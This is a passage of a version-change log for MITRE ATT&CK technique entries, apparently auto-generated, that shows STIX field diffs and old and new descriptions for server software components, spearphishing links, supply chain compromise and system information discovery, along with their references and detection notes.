external_references[5]['url']https://technet.microsoft.com/en-us/sysinternals/bb963902https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/
x_mitre_data_sources[0]Scheduled Job: Scheduled Job CreationCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[3]Process: Process CreationScheduled Job: Scheduled Job Creation
x_mitre_version1.01.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Scheduled Task Events Win10', 'description': 'Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.', 'url': 'https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events'}
external_references{'source_name': 'TechNet Scheduled Task Events', 'description': 'Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.', 'url': 'https://technet.microsoft.com/library/dd315590.aspx'}
external_references{'source_name': 'TechNet Autoruns', 'description': 'Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', 'url': 'https://technet.microsoft.com/en-us/sysinternals/bb963902'}
external_references{'source_name': 'TechNet Forum Scheduled Task Operational Setting', 'description': 'Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.', 'url': 'https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen'}
x_mitre_data_sourcesWindows Registry: Windows Registry Key Creation

[T1505] Server Software Component

Current version: 1.4

Version changed from: 1.2 → 1.4


Old Description
New Description
t1Adversaries may abuse legitimate extensible development featt1Adversaries may abuse legitimate extensible development feat
>ures of servers to establish persistent access to systems. E>ures of servers to establish persistent access to systems. E
>nterprise server applications may include features that allo>nterprise server applications may include features that allo
>w developers to write and install software or scripts to ext>w developers to write and install software or scripts to ext
>end the functionality of the main application. Adversaries m>end the functionality of the main application. Adversaries m
>ay install malicious components to extend and abuse server a>ay install malicious components to extend and abuse server a
>pplications.>pplications.(Citation: volexity_0day_sophos_FW)

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM', 'root']
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 17:05:44.743000+00:002022-10-19 21:18:29.349000+00:00
descriptionAdversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)
external_references[1]['source_name']US-CERT Alert TA15-314A Web Shellsvolexity_0day_sophos_FW
external_references[1]['description']US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.
external_references[1]['url']https://www.us-cert.gov/ncas/alerts/TA15-314Ahttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/
x_mitre_data_sources[2]File: File ModificationApplication Log: Application Log Content
x_mitre_data_sources[5]Network Traffic: Network Traffic FlowFile: File Modification
x_mitre_version1.21.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT Alert TA15-314A Web Shells', 'description': 'US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA15-314A'}
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content

[T1566.002] Phishing: Spearphishing Link

Current version: 2.3

Version changed from: 2.1 → 2.3


Old Description
New Description
t1Adversaries may send spearphishing emails with a malicious lt1Adversaries may send spearphishing emails with a malicious l
>ink in an attempt to gain access to victim systems. Spearphi>ink in an attempt to gain access to victim systems. Spearphi
>shing with a link is a specific variant of spearphishing. It>shing with a link is a specific variant of spearphishing. It
> is different from other forms of spearphishing in that it e> is different from other forms of spearphishing in that it e
>mploys the use of links to download malware contained in ema>mploys the use of links to download malware contained in ema
>il, instead of attaching malicious files to the email itself>il, instead of attaching malicious files to the email itself
>, to avoid defenses that may inspect email attachments. Spea>, to avoid defenses that may inspect email attachments. Spea
>rphishing may also involve social engineering techniques, su>rphishing may also involve social engineering techniques, su
>ch as posing as a trusted source.  All forms of spearphishin>ch as posing as a trusted source.  All forms of spearphishin
>g are electronically delivered social engineering targeted a>g are electronically delivered social engineering targeted a
>t a specific individual, company, or industry. In this case,>t a specific individual, company, or industry. In this case,
> the malicious emails contain links. Generally, the links wi> the malicious emails contain links. Generally, the links wi
>ll be accompanied by social engineering text and require the>ll be accompanied by social engineering text and require the
> user to actively click or copy and paste a URL into a brows> user to actively click or copy and paste a URL into a brows
>er, leveraging [User Execution](https://attack.mitre.org/tec>er, leveraging [User Execution](https://attack.mitre.org/tec
>hniques/T1204). The visited website may compromise the web b>hniques/T1204). The visited website may compromise the web b
>rowser using an exploit, or the user will be prompted to dow>rowser using an exploit, or the user will be prompted to dow
>nload applications, documents, zip files, or even executable>nload applications, documents, zip files, or even executable
>s depending on the pretext for the email in the first place.>s depending on the pretext for the email in the first place.
> Adversaries may also include links that are intended to int> Adversaries may also include links that are intended to int
>eract directly with an email reader, including embedded imag>eract directly with an email reader, including embedded imag
>es intended to exploit the end system directly or verify the>es intended to exploit the end system directly or verify the
> receipt of an email (i.e. web bugs/web beacons). Links may > receipt of an email (i.e. web bugs/web beacons). Additional
>also direct users to malicious applications  designed to [St>ly, adversaries may use seemingly benign links that abuse sp
>eal Application Access Token](https://attack.mitre.org/techn>ecial characters to mimic legitimate websites (known as an "
>iques/T1528)s, like OAuth tokens, in order to gain access to>IDN homograph attack").(Citation: CISA IDN ST05-016)  Advers
> protected applications and information.(Citation: Trend Mic>aries may also utilize links to perform consent phishing, ty
>ro Pawn Storm OAuth 2017)>pically with OAuth 2.0 request URLs that when accepted by th
 >e user provide permissions/access for malicious applications
 >, allowing adversaries to  [Steal Application Access Token](
 >https://attack.mitre.org/techniques/T1528)s.(Citation: Trend
 > Micro Pawn Storm OAuth 2017) These stolen access tokens all
 >ow the adversary to perform various actions on behalf of the
 > user via API calls. (Citation: Microsoft OAuth 2.0 Consent 
 >Phishing 2021)

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAustralian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-163
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 14:38:42.715000+00:002022-10-21 16:01:45.500000+00:00
descriptionAdversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
external_references[1]['source_name']capecACSC Email Spoofing
external_references[1]['url']https://capec.mitre.org/data/definitions/163.htmlhttps://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
external_references[2]['source_name']Trend Micro Pawn Storm OAuth 2017CISA IDN ST05-016
external_references[2]['description']Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.
external_references[2]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attackshttps://us-cert.cisa.gov/ncas/tips/ST05-016
external_references[3]['source_name']Microsoft Anti SpoofingTrend Micro Pawn Storm OAuth 2017
external_references[3]['description']Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.
external_references[3]['url']https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwidehttps://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks
external_references[4]['source_name']ACSC Email SpoofingMicrosoft OAuth 2.0 Consent Phishing 2021
external_references[4]['description']Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.Microsoft 365 Defender Threat Intelligence Team. (2021, June 14). Microsoft delivers comprehensive solution to battle rise in consent phishing emails. Retrieved December 13, 2021.
external_references[4]['url']https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdfhttps://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/
x_mitre_detectionURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites as well as links redirecting to adversary infrastructure based by upon suspicious OAuth patterns with unusual TLDs.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021). Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
x_mitre_version2.12.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Anti Spoofing', 'description': 'Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.', 'url': 'https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/163.html', 'external_id': 'CAPEC-163'}
x_mitre_contributorsKobi Haimovich, CardinalOps
x_mitre_contributorsMenachem Goldstein
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content

[T1598.003] Phishing for Information: Spearphishing Link

Current version: 1.3

Version changed from: 1.1 → 1.3


Old Description
New Description
t1Adversaries may send spearphishing messages with a malicioust1Adversaries may send spearphishing messages with a malicious
> link to elicit sensitive information that can be used durin> link to elicit sensitive information that can be used durin
>g targeting. Spearphishing for information is an attempt to >g targeting. Spearphishing for information is an attempt to 
>trick targets into divulging information, frequently credent>trick targets into divulging information, frequently credent
>ials or other actionable information. Spearphishing for info>ials or other actionable information. Spearphishing for info
>rmation frequently involves social engineering techniques, s>rmation frequently involves social engineering techniques, s
>uch as posing as a source with a reason to collect informati>uch as posing as a source with a reason to collect informati
>on (ex: [Establish Accounts](https://attack.mitre.org/techni>on (ex: [Establish Accounts](https://attack.mitre.org/techni
>ques/T1585) or [Compromise Accounts](https://attack.mitre.or>ques/T1585) or [Compromise Accounts](https://attack.mitre.or
>g/techniques/T1586)) and/or sending multiple, seemingly urge>g/techniques/T1586)) and/or sending multiple, seemingly urge
>nt messages.  All forms of spearphishing are electronically >nt messages.  All forms of spearphishing are electronically 
>delivered social engineering targeted at a specific individu>delivered social engineering targeted at a specific individu
>al, company, or industry. In this scenario, the malicious em>al, company, or industry. In this scenario, the malicious em
>ails contain links generally accompanied by social engineeri>ails contain links generally accompanied by social engineeri
>ng text to coax the user to actively click or copy and paste>ng text to coax the user to actively click or copy and paste
> a URL into a browser.(Citation: TrendMictro Phishing)(Citat> a URL into a browser.(Citation: TrendMictro Phishing)(Citat
>ion: PCMag FakeLogin) The given website may closely resemble>ion: PCMag FakeLogin) The given website may be a clone of a 
> a legitimate site in appearance and have a URL containing e>legitimate site (such as an online or corporate login portal
>lements from the real site. From the fake website, informati>) or maclosely resemble a legitimate site in appearance an
>on is gathered in web forms and sent to the attacker. Advers>d have a URL containing elements from the real site.   From 
>aries may also use information from previous reconnaissance >the fake website, information is gathered in web forms and s
>efforts (ex: [Search Open Websites/Domains](https://attack.m>ent to the adversary. Adversaries may also use information f
>itre.org/techniques/T1593) or [Search Victim-Owned Websites]>rom previous reconnaissance efforts (ex: [Search Open Websit
>(https://attack.mitre.org/techniques/T1594)) to craft persua>es/Domains](https://attack.mitre.org/techniques/T1593) or [S
>sive and believable lures.>earch Victim-Owned Websites](https://attack.mitre.org/techni
 >ques/T1594)) to craft persuasive and believable lures.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:42:26.537000+00:002022-10-21 16:01:47.611000+00:00
descriptionAdversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
external_references[1]['source_name']TrendMictro PhishingACSC Email Spoofing
external_references[1]['description']Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
external_references[1]['url']https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.htmlhttps://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
external_references[2]['source_name']PCMag FakeLoginTrendMictro Phishing
external_references[2]['description']Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.
external_references[2]['url']https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pageshttps://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html
external_references[3]['source_name']Microsoft Anti SpoofingPCMag FakeLogin
external_references[3]['description']Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.
external_references[3]['url']https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwidehttps://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages
external_references[4]['source_name']ACSC Email SpoofingMicrosoft Anti Spoofing
external_references[4]['description']Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.
external_references[4]['url']https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdfhttps://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
x_mitre_data_sources[3]Network Traffic: Network Traffic FlowNetwork Traffic: Network Connection Creation
x_mitre_version1.11.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsMenachem Goldstein
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow

[T1195] Supply Chain Compromise

Current version: 1.5

Version changed from: 1.2 → 1.5


Old Description
New Description
t1Adversaries may manipulate products or product delivery mecht1Adversaries may manipulate products or product delivery mech
>anisms prior to receipt by a final consumer for the purpose >anisms prior to receipt by a final consumer for the purpose 
>of data or system compromise.  Supply chain compromise can t>of data or system compromise.  Supply chain compromise can t
>ake place at any stage of the supply chain including:  * Man>ake place at any stage of the supply chain including:  * Man
>ipulation of development tools * Manipulation of a developme>ipulation of development tools * Manipulation of a developme
>nt environment * Manipulation of source code repositories (p>nt environment * Manipulation of source code repositories (p
>ublic or private) * Manipulation of source code in open-sour>ublic or private) * Manipulation of source code in open-sour
>ce dependencies * Manipulation of software update/distributi>ce dependencies * Manipulation of software update/distributi
>on mechanisms * Compromised/infected system images (multiple>on mechanisms * Compromised/infected system images (multiple
> cases of removable media infected at the factory) (Citation> cases of removable media infected at the factory)(Citation:
>: IBM Storwize) (Citation: Schneider Electric USB Malware)  > IBM Storwize)(Citation: Schneider Electric USB Malware)  * 
>* Replacement of legitimate software with modified versions >Replacement of legitimate software with modified versions * 
>* Sales of modified/counterfeit products to legitimate distr>Sales of modified/counterfeit products to legitimate distrib
>ibutors * Shipment interdiction  While supply chain compromi>utors * Shipment interdiction  While supply chain compromise
>se can impact any component of hardware or software, attacke> can impact any component of hardware or software, adversari
>rs looking to gain execution have often focused on malicious>es looking to gain execution have often focused on malicious
> additions to legitimate software in software distribution o> additions to legitimate software in software distribution o
>r update channels. (Citation: Avast CCleaner3 2018) (Citatio>r update channels.(Citation: Avast CCleaner3 2018)(Citation:
>n: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) T> Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targ
>argeting may be specific to a desired victim set (Citation: >eting may be specific to a desired victim set or malicious s
>Symantec Elderwood Sept 2012) or malicious software may be d>oftware may be distributed to a broad set of consumers but o
>istributed to a broad set of consumers but only move on to a>nly move on to additional tactics on specific victims.(Citat
>dditional tactics on specific victims. (Citation: Avast CCle>ion: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3
>aner3 2018) (Citation: Command Five SK 2011) Popular open so> 2018)(Citation: Command Five SK 2011) Popular open source p
>urce projects that are used as dependencies in many applicat>rojects that are used as dependencies in many applications m
>ions may also be targeted as a means to add malicious code t>ay also be targeted as a means to add malicious code to user
>o users of the dependency. (Citation: Trendmicro NPM Comprom>s of the dependency.(Citation: Trendmicro NPM Compromise)
>ise) 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_data_sources['Sensor Health: Host Status', 'File: File Metadata']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAvast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.
external_referencesCommand Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.
external_referencesIBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019.
external_referencesCAPEC-437
external_referencesCAPEC-438
external_referencesCAPEC-439
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-437
external_referencesCAPEC-438
external_referencesCAPEC-439
external_referencesCommand Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.
external_referencesO'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.
external_referencesTrendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
values_changed
STIX FieldOld valueNew Value
modified2021-01-06 19:32:28.382000+00:002022-04-28 16:03:22.870000+00:00
descriptionAdversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)
external_references[1]['source_name']capecAvast CCleaner3 2018
external_references[1]['url']https://capec.mitre.org/data/definitions/437.htmlhttps://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities
external_references[2]['source_name']capecCommand Five SK 2011
external_references[2]['url']https://capec.mitre.org/data/definitions/438.htmlhttps://www.commandfive.com/papers/C5_APT_SKHack.pdf
external_references[3]['source_name']capecIBM Storwize
external_references[3]['url']https://capec.mitre.org/data/definitions/439.htmlhttps://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E
external_references[4]['source_name']IBM StorwizeSymantec Elderwood Sept 2012
external_references[4]['description']IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019.O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.
external_references[4]['url']https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-Ehttps://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
external_references[6]['source_name']Avast CCleaner3 2018Trendmicro NPM Compromise
external_references[6]['description']Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
external_references[6]['url']https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacitieshttps://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets
external_references[8]['source_name']Command Five SK 2011capec
external_references[8]['url']https://www.commandfive.com/papers/C5_APT_SKHack.pdfhttps://capec.mitre.org/data/definitions/437.html
external_references[9]['source_name']Symantec Elderwood Sept 2012capec
external_references[9]['url']https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdfhttps://capec.mitre.org/data/definitions/438.html
external_references[10]['source_name']Trendmicro NPM Compromisecapec
external_references[10]['url']https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-walletshttps://capec.mitre.org/data/definitions/439.html
x_mitre_version1.21.5

[T1082] System Information Discovery

Current version: 2.5

Version changed from: 2.3 → 2.5


Old Description
New Description
t1An adversary may attempt to get detailed information about tt1An adversary may attempt to get detailed information about t
>he operating system and hardware, including version, patches>he operating system and hardware, including version, patches
>, hotfixes, service packs, and architecture. Adversaries may>, hotfixes, service packs, and architecture. Adversaries may
> use the information from [System Information Discovery](htt> use the information from [System Information Discovery](htt
>ps://attack.mitre.org/techniques/T1082) during automated dis>ps://attack.mitre.org/techniques/T1082) during automated dis
>covery to shape follow-on behaviors, including whether or no>covery to shape follow-on behaviors, including whether or no
>t the adversary fully infects the target and/or attempts spe>t the adversary fully infects the target and/or attempts spe
>cific actions.  Tools such as [Systeminfo](https://attack.mi>cific actions.  Tools such as [Systeminfo](https://attack.mi
>tre.org/software/S0096) can be used to gather detailed syste>tre.org/software/S0096) can be used to gather detailed syste
